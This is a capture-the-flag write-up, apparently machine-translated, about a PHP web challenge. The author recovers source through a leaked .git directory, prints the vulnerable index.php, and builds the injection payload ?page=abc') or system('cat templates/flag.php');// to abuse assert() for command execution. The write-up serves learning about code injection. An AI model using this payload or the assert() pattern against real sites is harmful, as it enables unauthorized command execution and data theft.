1. Open the web page to show ：
   
   Click to place the link and view the source code discovery ：
   

   This directly determines that there may be git Leaked , Use it directly githack Tools to obtain source code .

2. After obtaining the source code , An audit of the code revealed , The only point that can be used is index.php in ：
   Code audit ：

   <?php
   
   if (isset($_GET['page'])) {
           #  Pass in  GET  Parameters  page
   	$page = $_GET['page'];
   } else {
         
   	$page = "home";
   }
   
   $file = "templates/" . $page . ".php";
   
   // I heard '..' is dangerous!
   assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
   
   // TODO: Make this look nice
   assert("file_exists('$file')") or die("That file doesn't exist!");
   
   ?>
   <!DOCTYPE html>
   <html>
   	<head>
   		<meta charset="utf-8">
   		<meta http-equiv="X-UA-Compatible" content="IE=edge">
   		<meta name="viewport" content="width=device-width, initial-scale=1">
   		
   		<title>My PHP Website</title>
   		
   		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
   	</head>
   	<body>
   		<nav class="navbar navbar-inverse navbar-fixed-top">
   			<div class="container">
   		    	<div class="navbar-header">
   		    		<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
   		            	<span class="sr-only">Toggle navigation</span>
   		            	<span class="icon-bar"></span>
   		            	<span class="icon-bar"></span>
   		            	<span class="icon-bar"></span>
   		          	</button>
   		          	<a class="navbar-brand" href="#">Project name</a>
   		        </div>
   		        <div id="navbar" class="collapse navbar-collapse">
   		          	<ul class="nav navbar-nav">
   		            	<li <?php if ($page == "home") {
          ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
   		            	<li <?php if ($page == "about") {
          ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
   		            	<li 
   							<?php 
   								if ($page == "contact") {
          
   									?>class="active"<?php }
   							 ?>>
   							 <a href="?page=contact">Contact</a>
   						</li>
   						<!--<li <?php if ($page == "flag") {
          ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
   		          	</ul>
   		        </div>
   		    </div>
   		</nav>
   		
   		<div class="container" style="margin-top: 50px">
   			<?php
   				require_once $file;
   			?>
   			
   		</div>
   		
   		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
   		<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
   	</body>
   </html>
   

3. After preliminary audit , My idea is to enter the following link directly ：

   http://61.147.171.105:63924/?page=flag

   Obviously, he died miserably , Then you will find that it is annotated in the source code , Then I don't know where I can use it , I'm confused , And then look wp Only then discovered

4. We can find two assertions in the code ：

   // I heard '..' is dangerous!
   	assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
   	
   	// TODO: Make this look nice
   	assert("file_exists('$file')") or die("That file doesn't exist!");
   

   At the beginning of the audit, I didn't think it could be used here , What we use here is assert() Assertion , It can execute parameters as code .

   Built payload:

   ?page=abc’) or system(“cat templates/flag.php”);//
   Check the source code to find flag 了 .

5. explain ：
   To tell the truth, everyone may be confused , How can this be used ？ This is not in line with common sense ？ But on second thought, this and SQL Injection is not very similar , When we use the above parameters , Our code execution will become ：

   assert(“strpos(‘templates/?page=abc’) or system(“cat templates/flag.php”);//.php’, ‘…’) === false”)

   To be honest, this is very interesting

6. verification ：
   stay PHP After discovery , I want to stay JAVA and Python Is there such a thing in ？

   JAVA verification ：

   unfortunately ,JAVA It is the safest , This method doesn't work （ in my opinion ）

   Python verification ：

   # -*- coding:utf-8 -*-
   
   import os
   
   a = input(" Please enter the file name ：")
   print(a)
   assert  os.path.exists(a)," It's a fake "
   print(" end ")
   
   

   

   Failure

summary ：

1. When simple functions are in front of us, we need to be more sensitive , Sometimes this impossibility is the key to the problem
2. When we find some loopholes, we must have the courage to practice , This requires us to master more programming language skills , Don't think it's difficult , First of all, who can make a coincidence? Second, all programming languages are a mother, but the rules of programming have changed